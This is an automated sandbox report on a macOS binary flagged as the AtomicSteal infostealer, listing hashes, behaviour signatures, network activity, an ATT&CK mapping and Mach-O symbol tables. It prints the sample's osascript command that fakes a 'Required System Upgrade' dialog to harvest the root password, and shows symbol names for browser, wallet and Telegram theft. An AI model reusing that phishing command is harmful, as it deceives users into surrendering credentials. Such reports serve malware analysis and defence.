macOS Analysis Report
1rNsYj4HBT

Overview

General Information

Sample Name:1rNsYj4HBT
Analysis ID:1323173
MD5:a1a7891c4b4cd308e31c2c62860c8581
SHA1:07fb38e48529490da73dcb9a0812bd3bb3337189
SHA256:6af663985f92966477bc68047e621675b26eb3f9626d8b7c0e2537b3211b118a

Detection

Score:48
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Contains symbols with suspicious names likely related to encryption
Contains symbols with suspicious names likely related to networking
Uses AppleScript framework/components containing Apple Script related functionalities
Reads the systems hostname
Reads hardware related sysctl values
Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'
Executes commands using a shell command-line interpreter
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)
Reads launchservices plist files
Sample is a FAT Mach-O sample containing binaries for multiple architectures
Uses AppleScript scripting additions containing additional functionalities for Apple Scripts

Classification

Joe Sandbox Version:38.0.0 Ammolite
Analysis ID:1323173
Start date and time:2023-10-10 20:28:16 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 31s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Virtual Machine, High Sierra (Office 2016 16.16, Java 11.0.2+9, Adobe Reader 2019.010.20099)
macOS major version:10.13
CPU architecture:x86_64
Analysis Mode:default
Sample file name:1rNsYj4HBT
Detection:MAL
Classification:mal48.mac@0/0@0/0
  • Excluded IPs from analysis (whitelisted): 17.253.83.196, 17.253.83.200, 23.39.1.85, 17.253.83.195, 17.253.83.198, 17.253.82.125, 17.253.82.253, 17.253.4.253
  • Excluded domains from analysis (whitelisted): cds-cdn.v.aaplimg.com, e11408.d.akamaiedge.net, cds.apple.com.akadns.net, time-macos.apple.com, ocsp-a.g.aaplimg.com, fbs.smoot.apple.com, cds.apple.com, help-ar.apple.com.edgekey.net, valid.apple.com, lb._dns-sd._udp.0.11.168.192.in-addr.arpa, ocsp-lb.apple.com.akadns.net, ocsp.apple.com, glb-fbs.v.aaplimg.com, valid.origin-apple.com.akadns.net, help.origin-apple.com.akadns.net, valid-apple.g.aaplimg.com, time.g.aaplimg.com, help.apple.com, world-gen.g.aaplimg.com
  • VT rate limit hit for: 1rNsYj4HBT
Command:/Users/berri/Desktop/1rNsYj4HBT
PID:897
Exit Code:
Exit Code Info:
Killed:True
Standard Output:

Standard Error:<dscl_cmd> DS Error: -14090 (eDSAuthFailed)
  • System is macvm-highsierra
  • 1rNsYj4HBT (MD5: a1a7891c4b4cd308e31c2c62860c8581) Arguments: /Users/berri/Desktop/1rNsYj4HBT
    • sh New Fork (PID: 898, Parent: 897)
    • dscl (MD5: 2072d2ac07a471913b06fed4b4bd55cf) Arguments: dscl . authonly root
    • sh New Fork (PID: 899, Parent: 897)
    • osascript (MD5: 86c0eb9ab6768a4a8e723dcda40bc65a) Arguments: osascript -e display dialog 'Required System Upgrade. Please enter passphrase for root.' default answer '' with icon caution buttons {'Continue'} default button 'Continue' giving up after 150 with title 'Application wants to install helper' with hidden answer
  • cleanup
No yara matches
No Snort rule has matched

AV Detection

Source: 1rNsYj4HBT | ReversingLabs: Detection: 31%
Source: submission: 1rNsYj4HBT | Mach-O symbol: _mz_zip_reader_is_file_encrypted
Source: unknown | HTTPS traffic detected: 100.22.10.168:443 -> 192.168.11.11:49398 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 100.22.10.168:443 -> 192.168.11.11:49400 version: TLS 1.2
Source: submission: 1rNsYj4HBT | Mach-O symbol: _send
Source: submission: 1rNsYj4HBT | Mach-O symbol: _send_data_via_http
Source: submission: 1rNsYj4HBT | Mach-O symbol: _socket
Source: submission: 1rNsYj4HBT | Mach-O symbol: _inet_addr
Source: submission: 1rNsYj4HBT | Mach-O symbol: _connect
Source: unknown | Network traffic detected: HTTP traffic on port 49398 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49400
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49398
Source: unknown | Network traffic detected: HTTP traffic on port 49400 -> 443
Source: unknown | TCP traffic detected without corresponding DNS query: 17.253.83.202
Source: unknown | TCP traffic detected without corresponding DNS query: 23.47.151.53
Source: 1rNsYj4HBT, 00000897.00000250.1.000000010aab9000.000000010aad4000.r--.sdmp | String found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: 1rNsYj4HBT, 00000897.00000250.1.000000010aab9000.000000010aad4000.r--.sdmp | String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: 1rNsYj4HBT, 00000897.00000250.1.000000010aab9000.000000010aad4000.r--.sdmp | String found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: 1rNsYj4HBT, 00000897.00000250.1.000000010aab9000.000000010aad4000.r--.sdmp | String found in binary or memory: http://www.apple.com/certificateauthority0
Source: 1rNsYj4HBT, 00000897.00000250.1.000000010aab9000.000000010aad4000.r--.sdmp | String found in binary or memory: https://www.apple.com/appleca/0
Source: classification engine | Classification label: mal48.mac@0/0@0/0
Source: /usr/bin/osascript (PID: 899) | AppleScript framework/component info plist opened: /System/Library/Components/AppleScript.component/Contents/Info.plist
Source: /usr/bin/osascript (PID: 899) | AppleScript framework/component info plist opened: /System/Library/PrivateFrameworks/AppleScript.framework/Resources/Info.plist
Source: /bin/sh (PID: 899) | Osascript command executed: osascript -e display dialog 'Required System Upgrade. Please enter passphrase for root.' default answer '' with icon caution buttons {'Continue'} default button 'Continue' giving up after 150 with title 'Application wants to install helper' with hidden answer
Source: /Users/berri/Desktop/1rNsYj4HBT (PID: 897) | Shell command executed: sh -c dscl . authonly 'root' ''
Source: /Users/berri/Desktop/1rNsYj4HBT (PID: 897) | Shell command executed: sh -c osascript -e 'display dialog 'Required System Upgrade. Please enter passphrase for root.' default answer '' with icon caution buttons {'Continue'} default button 'Continue' giving up after 150 with title 'Application wants to install helper' with hidden answer'
Source: /usr/bin/osascript (PID: 899) | Launchservices plist file read: /System/Library/Preferences/Logging/Subsystems/com.apple.launchservices.plist
Source: submission | File header: Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL>] [arm64:Mach-O 64-bit arm64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|PIE>]
Source: /usr/bin/osascript (PID: 899) | AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 899) | AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 899) | AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 899) | Random device file read: /dev/random
Source: submission | Mach-O header: Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL>] [arm64:Mach-O 64-bit arm64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|PIE>]
Source: /usr/bin/osascript (PID: 899) | Sysctl read request: kern.safeboot (1.66)
Source: /bin/sh (PID: 898) | Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 899) | Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/osascript (PID: 899) | Sysctl read request: hw.availcpu (6.25)
Source: /usr/bin/osascript (PID: 899) | System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
MITRE ATT&CK Matrix (the number after a technique is the count of matched signatures)

  • Initial Access: Valid Accounts, Default Accounts
  • Execution: Scripting (1), AppleScript (3)
  • Persistence: Path Interception, Boot or Logon Initialization Scripts
  • Privilege Escalation: Path Interception, Boot or Logon Initialization Scripts
  • Defense Evasion: Scripting (1), Rootkit
  • Credential Access: OS Credential Dumping, LSASS Memory
  • Discovery: System Information Discovery (41), Application Window Discovery
  • Lateral Movement: Remote Services, Remote Desktop Protocol
  • Collection: Data from Local System, Data from Removable Media
  • Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth
  • Command and Control: Encrypted Channel (1), Application Layer Protocol (1)
  • Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS
  • Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization
  • Impact: Modify System Partition, Device Lockout
Source | Detection | Scanner | Label
1rNsYj4HBT | 32% | ReversingLabs | MacOS.Trojan.AtomicSteal
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
pubingress-feedback-1a6fe9caff1148fe.elb.us-west-2.amazonaws.com | 100.22.10.168 | true | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
100.22.10.168 | pubingress-feedback-1a6fe9caff1148fe.elb.us-west-2.amazonaws.com | United States | 16509 | AMAZON-02US | false
23.47.151.53 | unknown | United States | 16625 | AKAMAI-ASUS | false
      No context
      No created / dropped files found
      File type:Mach-O universal binary with 2 architectures: [x86_64:Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL>] [arm64:Mach-O 64-bit arm64 executable, flags:<NOUNDEFS|DYLDLINK|TWOLEVEL|PIE>]
      Entropy (8bit):5.300390215374691
      TrID:
      • Mac OS X Universal Binary executable (4004/1) 75.96%
      • HSC music composer song (1267/141) 24.04%
      File name:1rNsYj4HBT
      File size:442'038 bytes
      MD5:a1a7891c4b4cd308e31c2c62860c8581
      SHA1:07fb38e48529490da73dcb9a0812bd3bb3337189
      SHA256:6af663985f92966477bc68047e621675b26eb3f9626d8b7c0e2537b3211b118a
      SHA512:d2f5b550c046f978e591a62333278c493e144a8bb3273de1c73f383fa8cbad3cefd41a794d0b5229ae7395eb80351dd40993c38fccbdde1cc1e8d507dc929816
      SSDEEP:6144:loH+fhNBhS7TF70JApF8y4wWvNzbm7Qso1XFq4k24wR:lok8TFUi54wWFzbm7k1XFzl4wR
      TLSH:FD942A55932DF812E1D6E0B2BBC5C7E2E414F23404B0915F7B8D97BABFB2A856816703
General Information for header 1
Endian: little-endian
Size: 64-bit
Architecture: x86_64
Filetype: execute
Nbr. of load commands: 13
Entry point: 0x1000042A0

segname: __PAGEZERO
vmaddr: 0x0
vmsize: 0x100000000
fileoff: 0x0
filesize: 0x0
maxprot: 0x0
initprot: 0x0
nsects: 0
flags: 0x0

segname: __TEXT
vmaddr: 0x100000000
vmsize: 0x2C000
fileoff: 0x0
filesize: 0x2C000
maxprot: 0x5
initprot: 0x5
nsects: 7
flags: 0x0
Datas:
sectname | segname | addr | size | offset | entropy | align | reloff | nreloc | flags
__text | __TEXT | 0x1000042A0 | 0x230A3 | 0x42A0 | 5.4065 | 0x4 | 0x0 | 0 | 0x80000400
__stubs | __TEXT | 0x100027344 | 0xF0 | 0x27344 | 3.2702 | 0x1 | 0x0 | 0 | 0x80000408
__stub_helper | __TEXT | 0x100027434 | 0x1E0 | 0x27434 | 4.3593 | 0x2 | 0x0 | 0 | 0x80000400
__cstring | __TEXT | 0x100027614 | 0x160C | 0x27614 | 5.1186 | 0x0 | 0x0 | 0 | 0x2
__const | __TEXT | 0x100028C20 | 0x1460 | 0x28C20 | 4.9712 | 0x4 | 0x0 | 0 | 0x0
__unwind_info | __TEXT | 0x10002A080 | 0x80 | 0x2A080 | 3.0039 | 0x2 | 0x0 | 0 | 0x0
__eh_frame | __TEXT | 0x10002A100 | 0x1EF8 | 0x2A100 | 3.5674 | 0x3 | 0x0 | 0 | 0x0

segname: __DATA
vmaddr: 0x10002C000
vmsize: 0x4000
fileoff: 0x2C000
filesize: 0x4000
maxprot: 0x3
initprot: 0x3
nsects: 6
flags: 0x0
Datas:
sectname | segname | addr | size | offset | entropy | align | reloff | nreloc | flags
__dyld | __DATA | 0x10002C000 | 0x10 | 0x2C000 | 2.6494 | 0x3 | 0x0 | 0 | 0x0
__got | __DATA | 0x10002C010 | 0x18 | 0x2C010 | -0.0000 | 0x3 | 0x0 | 0 | 0x6
__la_symbol_ptr | __DATA | 0x10002C028 | 0x140 | 0x2C028 | 2.7793 | 0x3 | 0x0 | 0 | 0x7
__data | __DATA | 0x10002C170 | 0x8F3 | 0x2C170 | 4.6185 | 0x4 | 0x0 | 0 | 0x0
__common | __DATA | 0x10002CC00 | 0x470 | 0x0 | 0.0000 | 0x9 | 0x0 | 0 | 0x1
__bss | __DATA | 0x10002D070 | 0x8 | 0x0 | 0.0000 | 0x3 | 0x0 | 0 | 0x1

segname: __LINKEDIT
vmaddr: 0x100030000
vmsize: 0x4000
fileoff: 0x30000
filesize: 0x2B20
maxprot: 0x1
initprot: 0x1
nsects: 0
flags: 0x0

symoff: 196952
nsyms: 275
stroff: 201688
strsize: 5960

ilocalsym: 0
nlocalsym: 69
iextdefsym: 69
nextdefsym: 163
iundefsym: 232
nundefsym: 43
tocoff: 0
ntoc: 0
modtaboff: 0
nmodtab: 0
extrefsymoff: 0
nextrefsyms: 0
indirectsymoff: 201352
nindirectsyms: 83
extreloff: 0
nextrel: 0
locreloff: 0
nlocrel: 0

name: 12
Datas: /usr/lib/dyld

uuid: AF6A3FC5-ECCD-32D0-B834-B50F62A51CA4

version: 656384
sdk: 852224

flavor: 4
count: 42

name: 24
timestamp: Thu Jan 1 01:00:02 1970
current_version: 1319.0.0
compatibility_version: 1.0.0
Datas: /usr/lib/libSystem.B.dylib

dataoff: 196608
datasize: 328

dataoff: 196936
datasize: 16
      _GrabFolder
      _GrabTox
      _NXArgc
      _NXArgv
      _SearchAndGrabChromium
      _TDEFL_READ_UNALIGNED_WORD
      _TDEFL_READ_UNALIGNED_WORD2
      _TDEFL_READ_UNALIGNED_WORD32
      _Telegram
      ___assert_rtn
      ___keymgr_dwarf2_register_sections
      ___progname
      __cthread_init_routine
      __dyld_func_lookup
      __free
      __getenv
      __malloc
      __memcpy
      __memset
      __mh_execute_header
      __start
      __strcat
      __strcmp
      __strcpy
      __strlen
      __strncmp
      __strpbrk
      __strtok
      __strtok.next_token
      _atexit
      _checkvalid
      _close
      _closedir
      _connect
      _environ
      _errno
      _exec
      _exit
      _fclose
      _ff_parsedata
      _fflush
      _fgmode
      _fopen
      _fread
      _free
      _free_list
      _freopen
      _fseeko
      _fsize
      _ftello
      _fwrite
      _getPlugWallets
      _getpagesize
      _getpwd
      _inet_addr
      _is_directory
      _localtime
      _mach_init_routine
      _main
      _malloc
      _masterpass
      _memcmp
      _memcpy
      _memset
      _miniz_def_alloc_func
      _miniz_def_free_func
      _miniz_def_realloc_func
      _mktime
      _mmap
      _mz_adler32
      _mz_bitmasks
      _mz_compress
      _mz_compress2
      _mz_compressBound
      _mz_crc32
      _mz_crc32.s_crc_table
      _mz_deflate
      _mz_deflateBound
      _mz_deflateEnd
      _mz_deflateInit
      _mz_deflateInit2
      _mz_deflateReset
      _mz_error
      _mz_error.s_error_descs
      _mz_file_read_func_stdio
      _mz_free
      _mz_inflate
      _mz_inflateEnd
      _mz_inflateInit
      _mz_inflateInit2
      _mz_inflateReset
      _mz_uncompress
      _mz_uncompress2
      _mz_version
      _mz_zip_add_mem_to_archive_file_in_place
      _mz_zip_add_mem_to_archive_file_in_place_v2
      _mz_zip_array_ensure_capacity
      _mz_zip_clear_last_error
      _mz_zip_compute_crc32_callback
      _mz_zip_dos_to_time_t
      _mz_zip_end
      _mz_zip_extract_archive_file_to_heap
      _mz_zip_extract_archive_file_to_heap_v2
      _mz_zip_file_read_func
      _mz_zip_file_stat_internal
      _mz_zip_file_write_callback
      _mz_zip_file_write_func
      _mz_zip_get_archive_file_start_offset
      _mz_zip_get_archive_size
      _mz_zip_get_central_dir_size
      _mz_zip_get_cfile
      _mz_zip_get_error_string
      _mz_zip_get_file_modified_time
      _mz_zip_get_last_error
      _mz_zip_get_mode
      _mz_zip_get_type
      _mz_zip_heap_write_func
      _mz_zip_is_zip64
      _mz_zip_locate_file_binary_search
      _mz_zip_mem_read_func
      _mz_zip_peek_last_error
      _mz_zip_read_archive_data
      _mz_zip_reader_end
      _mz_zip_reader_end_internal
      _mz_zip_reader_extract_file_iter_new
      _mz_zip_reader_extract_file_to_callback
      _mz_zip_reader_extract_file_to_cfile
      _mz_zip_reader_extract_file_to_file
      _mz_zip_reader_extract_file_to_heap
      _mz_zip_reader_extract_file_to_mem
      _mz_zip_reader_extract_file_to_mem_no_alloc
      _mz_zip_reader_extract_iter_free
      _mz_zip_reader_extract_iter_new
      _mz_zip_reader_extract_iter_read
      _mz_zip_reader_extract_to_callback
      _mz_zip_reader_extract_to_cfile
      _mz_zip_reader_extract_to_file
      _mz_zip_reader_extract_to_heap
      _mz_zip_reader_extract_to_mem
      _mz_zip_reader_extract_to_mem_no_alloc
      _mz_zip_reader_extract_to_mem_no_alloc1
      _mz_zip_reader_file_stat
      _mz_zip_reader_get_filename
      _mz_zip_reader_get_num_files
      _mz_zip_reader_init
      _mz_zip_reader_init_cfile
      _mz_zip_reader_init_file
      _mz_zip_reader_init_file_v2
      _mz_zip_reader_init_file_v2_rpb
      _mz_zip_reader_init_internal
      _mz_zip_reader_init_mem
      _mz_zip_reader_is_file_a_directory
      _mz_zip_reader_is_file_encrypted
      _mz_zip_reader_is_file_supported
      _mz_zip_reader_locate_file
      _mz_zip_reader_locate_file_v2
      _mz_zip_reader_locate_header_sig
      _mz_zip_reader_read_central_dir
      _mz_zip_reader_sort_central_dir_offsets_by_filename
      _mz_zip_set_file_times
      _mz_zip_set_last_error
      _mz_zip_time_t_to_dos_time
      _mz_zip_validate_archive
      _mz_zip_validate_file
      _mz_zip_validate_file_archive
      _mz_zip_validate_mem_archive
      _mz_zip_writer_add_cfile
      _mz_zip_writer_add_file
      _mz_zip_writer_add_from_zip_reader
      _mz_zip_writer_add_mem
      _mz_zip_writer_add_mem_ex
      _mz_zip_writer_add_mem_ex_v2
      _mz_zip_writer_add_put_buf_callback
      _mz_zip_writer_add_read_buf_callback
      _mz_zip_writer_add_to_central_dir
      _mz_zip_writer_compute_padding_needed_for_file_alignment
      _mz_zip_writer_create_central_dir_header
      _mz_zip_writer_create_local_dir_header
      _mz_zip_writer_create_zip64_extra_data
      _mz_zip_writer_end
      _mz_zip_writer_end_internal
      _mz_zip_writer_finalize_archive
      _mz_zip_writer_finalize_heap_archive
      _mz_zip_writer_init
      _mz_zip_writer_init_cfile
      _mz_zip_writer_init_file
      _mz_zip_writer_init_file_v2
      _mz_zip_writer_init_from_reader
      _mz_zip_writer_init_from_reader_v2
      _mz_zip_writer_init_from_reader_v2_noreopen
      _mz_zip_writer_init_heap
      _mz_zip_writer_init_heap_v2
      _mz_zip_writer_init_v2
      _mz_zip_writer_update_zip64_extension_block
      _mz_zip_writer_validate_archive_name
      _mz_zip_writer_write_zeros
      _mz_zip_zero_struct
      _names
      _open
      _opendir
      _parseFF
      _parse_steam
      _pclose
      _pikfolder
      _plugin_paths
      _popen
      _pwd_getted
      _read
      _readdir
      _readwrite
      _realloc
      _remove
      _s_tdefl_large_dist_extra
      _s_tdefl_large_dist_sym
      _s_tdefl_len_extra
      _s_tdefl_len_sym
      _s_tdefl_num_probes
      _s_tdefl_packed_code_size_syms_swizzle
      _s_tdefl_small_dist_extra
      _s_tdefl_small_dist_sym
      _send
      _send_data_via_http
      _snprintf
      _socket
      _stat
      _strlen
      _tcc
      _tdefl_calculate_minimum_redundancy
      _tdefl_compress
      _tdefl_compress_block
      _tdefl_compress_buffer
      _tdefl_compress_fast
      _tdefl_compress_lz_codes
      _tdefl_compress_mem_to_heap
      _tdefl_compress_mem_to_mem
      _tdefl_compress_mem_to_output
      _tdefl_compress_normal
      _tdefl_compressor_alloc
      _tdefl_compressor_free
      _tdefl_create_comp_flags_from_zip_params
      _tdefl_flush_block
      _tdefl_flush_output_buffer
      _tdefl_get_adler32
      _tdefl_get_prev_return_status
      _tdefl_huffman_enforce_max_code_size
      _tdefl_init
      _tdefl_optimize_huffman_table
      _tdefl_output_buffer_putter
      _tdefl_radix_sort_syms
      _tdefl_start_dynamic_block
      _tdefl_start_static_block
      _tdefl_write_image_to_png_file_in_memory
      _tdefl_write_image_to_png_file_in_memory_ex
      _tdefl_write_image_to_png_file_in_memory_ex.chans
      _tdefl_write_image_to_png_file_in_memory_ex.s_tdefl_png_num_probes
      _time
      _tinfl_decompress
      _tinfl_decompress.s_dist_base
      _tinfl_decompress.s_dist_extra
      _tinfl_decompress.s_length_base
      _tinfl_decompress.s_length_dezigzag
      _tinfl_decompress.s_length_extra
      _tinfl_decompress.s_min_table_sizes
      _tinfl_decompress_mem_to_callback
      _tinfl_decompress_mem_to_heap
      _tinfl_decompress_mem_to_mem
      _tinfl_decompressor_alloc
      _tinfl_decompressor_free
      _userinfo
      _utime
      _writeall
      _writetext
      _zip
      dyld_stub_binding_helper
      start

      General Information for header 2
      Endian: little-endian
      Size: 64-bit
      Architecture: arm64
      Filetype: execute
      Nbr. of load commands: 17
      Entry point: 0x1FFA8

      segname: __PAGEZERO
      vmaddr: 0x0
      vmsize: 0x100000000
      fileoff: 0x0
      filesize: 0x0
      maxprot: 0x0
      initprot: 0x0
      nsects: 0
      flags: 0x0

      segname: __TEXT
      vmaddr: 0x100000000
      vmsize: 0x28000
      fileoff: 0x0
      filesize: 0x28000
      maxprot: 0x5
      initprot: 0x5
      nsects: 6
      flags: 0x0
      Sections:
      sectname | segname | addr | size | offset | entropy | align | reloff | nreloc | flags
      __text | __TEXT | 0x100003588 | 0x21B6C | 0x3588 | 5.8882 | 0x2 | 0x0 | 0 | 0x80000400
      __stubs | __TEXT | 0x1000250F4 | 0x1D4 | 0x250F4 | 3.7094 | 0x2 | 0x0 | 0 | 0x80000408
      __stub_helper | __TEXT | 0x1000252C8 | 0x1EC | 0x252C8 | 3.7541 | 0x2 | 0x0 | 0 | 0x80000400
      __const | __TEXT | 0x1000254B4 | 0x1430 | 0x254B4 | 5.0033 | 0x2 | 0x0 | 0 | 0x0
      __cstring | __TEXT | 0x1000268E4 | 0x152B | 0x268E4 | 5.0925 | 0x0 | 0x0 | 0 | 0x2
      __unwind_info | __TEXT | 0x100027E10 | 0x1F0 | 0x27E10 | 4.7636 | 0x2 | 0x0 | 0 | 0x0

      segname: __DATA_CONST
      vmaddr: 0x100028000
      vmsize: 0x4000
      fileoff: 0x28000
      filesize: 0x4000
      maxprot: 0x3
      initprot: 0x3
      nsects: 1
      flags: 0x10
      Sections:
      sectname | segname | addr | size | offset | entropy | align | reloff | nreloc | flags
      __got | __DATA_CONST | 0x100028000 | 0x20 | 0x28000 | -0.0000 | 0x3 | 0x0 | 0 | 0x6

      segname: __DATA
      vmaddr: 0x10002C000
      vmsize: 0x4000
      fileoff: 0x2C000
      filesize: 0x4000
      maxprot: 0x3
      initprot: 0x3
      nsects: 4
      flags: 0x0
      Sections:
      sectname | segname | addr | size | offset | entropy | align | reloff | nreloc | flags
      __la_symbol_ptr | __DATA | 0x10002C000 | 0x138 | 0x2C000 | 2.7774 | 0x3 | 0x0 | 0 | 0x7
      __data | __DATA | 0x10002C138 | 0x8DB | 0x2C138 | 4.5488 | 0x3 | 0x0 | 0 | 0x0
      __common | __DATA | 0x10002CC00 | 0x470 | 0x0 | 0.0000 | 0x9 | 0x0 | 0 | 0x1
      __bss | __DATA | 0x10002D070 | 0x8 | 0x0 | 0.0000 | 0x3 | 0x0 | 0 | 0x1

      segname: __LINKEDIT
      vmaddr: 0x100030000
      vmsize: 0x4000
      fileoff: 0x30000
      filesize: 0x3EB6
      maxprot: 0x1
      initprot: 0x1
      nsects: 0
      flags: 0x0

      rebase_off: 196608
      rebase_size: 16
      bind_off: 196624
      bind_size: 80
      weak_bind_off: 0
      weak_bind_size: 0
      lazy_bind_off: 196704
      lazy_bind_size: 592
      export_off: 197296
      export_size: 2936

      symoff: 200560
      nsyms: 264
      stroff: 205112
      strsize: 5768

      ilocalsym: 0
      nlocalsym: 63
      iextdefsym: 63
      nextdefsym: 158
      iundefsym: 221
      nundefsym: 43
      tocoff: 0
      ntoc: 0
      modtaboff: 0
      nmodtab: 0
      extrefsymoff: 0
      nextrefsyms: 0
      indirectsymoff: 204784
      nindirectsyms: 82
      extreloff: 0
      nextrel: 0
      locreloff: 0
      nlocrel: 0

      name: 12
      Data: /usr/lib/dyld

      uuid: C342A359-4D41-30AB-B6B0-8B9DFCCE1EAE

      platform: 1
      minos: 720896
      sdk: 852224
      ntools: 1
      Data: .

      version: 0

      entryoff: 130984
      stacksize: 0

      name: 24
      timestamp: Thu Jan 1 01:00:02 1970
      current_version: 1319.0.0
      compatibility_version: 1.0.0
      Data: /usr/lib/libSystem.B.dylib

      dataoff: 200232
      datasize: 328

      dataoff: 200560
      datasize: 0

      dataoff: 210880
      datasize: 1782

      _GrabFolder
      _GrabTox
      _SearchAndGrabChromium
      _Telegram
      ___assert_rtn
      ___chkstk_darwin
      ___stack_chk_fail
      ___stack_chk_guard
      __dyld_private
      __free
      __getenv
      __malloc
      __memcpy
      __memset
      __mh_execute_header
      __strcat
      __strcmp
      __strcpy
      __strlen
      __strncmp
      __strpbrk
      __strtok
      __strtok.next_token
      _bzero
      _checkvalid
      _close
      _closedir
      _connect
      _environ
      _exec
      _fclose
      _ff_parsedata
      _fflush
      _fgmode
      _fopen
      _fread
      _free
      _free_list
      _freopen
      _fseeko
      _fsize
      _ftello
      _fwrite
      _getPlugWallets
      _getpagesize
      _getpwd
      _inet_addr
      _is_directory
      _localtime
      _main
      _malloc
      _masterpass
      _memcmp
      _memcpy
      _memset
      _miniz_def_alloc_func
      _miniz_def_free_func
      _miniz_def_realloc_func
      _mktime
      _mmap
      _mz_adler32
      _mz_bitmasks
      _mz_compress
      _mz_compress2
      _mz_compressBound
      _mz_crc32
      _mz_crc32.s_crc_table
      _mz_deflate
      _mz_deflateBound
      _mz_deflateEnd
      _mz_deflateInit
      _mz_deflateInit2
      _mz_deflateReset
      _mz_error
      _mz_error.s_error_descs
      _mz_file_read_func_stdio
      _mz_free
      _mz_inflate
      _mz_inflateEnd
      _mz_inflateInit
      _mz_inflateInit2
      _mz_inflateReset
      _mz_uncompress
      _mz_uncompress2
      _mz_version
      _mz_zip_add_mem_to_archive_file_in_place
      _mz_zip_add_mem_to_archive_file_in_place_v2
      _mz_zip_array_ensure_capacity
      _mz_zip_clear_last_error
      _mz_zip_compute_crc32_callback
      _mz_zip_dos_to_time_t
      _mz_zip_end
      _mz_zip_extract_archive_file_to_heap
      _mz_zip_extract_archive_file_to_heap_v2
      _mz_zip_file_read_func
      _mz_zip_file_stat_internal
      _mz_zip_file_write_callback
      _mz_zip_file_write_func
      _mz_zip_get_archive_file_start_offset
      _mz_zip_get_archive_size
      _mz_zip_get_central_dir_size
      _mz_zip_get_cfile
      _mz_zip_get_error_string
      _mz_zip_get_file_modified_time
      _mz_zip_get_last_error
      _mz_zip_get_mode
      _mz_zip_get_type
      _mz_zip_heap_write_func
      _mz_zip_is_zip64
      _mz_zip_locate_file_binary_search
      _mz_zip_mem_read_func
      _mz_zip_peek_last_error
      _mz_zip_read_archive_data
      _mz_zip_reader_end
      _mz_zip_reader_end_internal
      _mz_zip_reader_extract_file_iter_new
      _mz_zip_reader_extract_file_to_callback
      _mz_zip_reader_extract_file_to_cfile
      _mz_zip_reader_extract_file_to_file
      _mz_zip_reader_extract_file_to_heap
      _mz_zip_reader_extract_file_to_mem
      _mz_zip_reader_extract_file_to_mem_no_alloc
      _mz_zip_reader_extract_iter_free
      _mz_zip_reader_extract_iter_new
      _mz_zip_reader_extract_iter_read
      _mz_zip_reader_extract_to_callback
      _mz_zip_reader_extract_to_cfile
      _mz_zip_reader_extract_to_file
      _mz_zip_reader_extract_to_heap
      _mz_zip_reader_extract_to_mem
      _mz_zip_reader_extract_to_mem_no_alloc
      _mz_zip_reader_extract_to_mem_no_alloc1
      _mz_zip_reader_file_stat
      _mz_zip_reader_get_filename
      _mz_zip_reader_get_num_files
      _mz_zip_reader_init
      _mz_zip_reader_init_cfile
      _mz_zip_reader_init_file
      _mz_zip_reader_init_file_v2
      _mz_zip_reader_init_file_v2_rpb
      _mz_zip_reader_init_internal
      _mz_zip_reader_init_mem
      _mz_zip_reader_is_file_a_directory
      _mz_zip_reader_is_file_encrypted
      _mz_zip_reader_is_file_supported
      _mz_zip_reader_locate_file
      _mz_zip_reader_locate_file_v2
      _mz_zip_reader_locate_header_sig
      _mz_zip_reader_read_central_dir
      _mz_zip_reader_sort_central_dir_offsets_by_filename
      _mz_zip_set_file_times
      _mz_zip_set_last_error
      _mz_zip_time_t_to_dos_time
      _mz_zip_validate_archive
      _mz_zip_validate_file
      _mz_zip_validate_file_archive
      _mz_zip_validate_mem_archive
      _mz_zip_writer_add_cfile
      _mz_zip_writer_add_file
      _mz_zip_writer_add_from_zip_reader
      _mz_zip_writer_add_mem
      _mz_zip_writer_add_mem_ex
      _mz_zip_writer_add_mem_ex_v2
      _mz_zip_writer_add_put_buf_callback
      _mz_zip_writer_add_read_buf_callback
      _mz_zip_writer_add_to_central_dir
      _mz_zip_writer_compute_padding_needed_for_file_alignment
      _mz_zip_writer_create_central_dir_header
      _mz_zip_writer_create_local_dir_header
      _mz_zip_writer_create_zip64_extra_data
      _mz_zip_writer_end
      _mz_zip_writer_end_internal
      _mz_zip_writer_finalize_archive
      _mz_zip_writer_finalize_heap_archive
      _mz_zip_writer_init
      _mz_zip_writer_init_cfile
      _mz_zip_writer_init_file
      _mz_zip_writer_init_file_v2
      _mz_zip_writer_init_from_reader
      _mz_zip_writer_init_from_reader_v2
      _mz_zip_writer_init_from_reader_v2_noreopen
      _mz_zip_writer_init_heap
      _mz_zip_writer_init_heap_v2
      _mz_zip_writer_init_v2
      _mz_zip_writer_update_zip64_extension_block
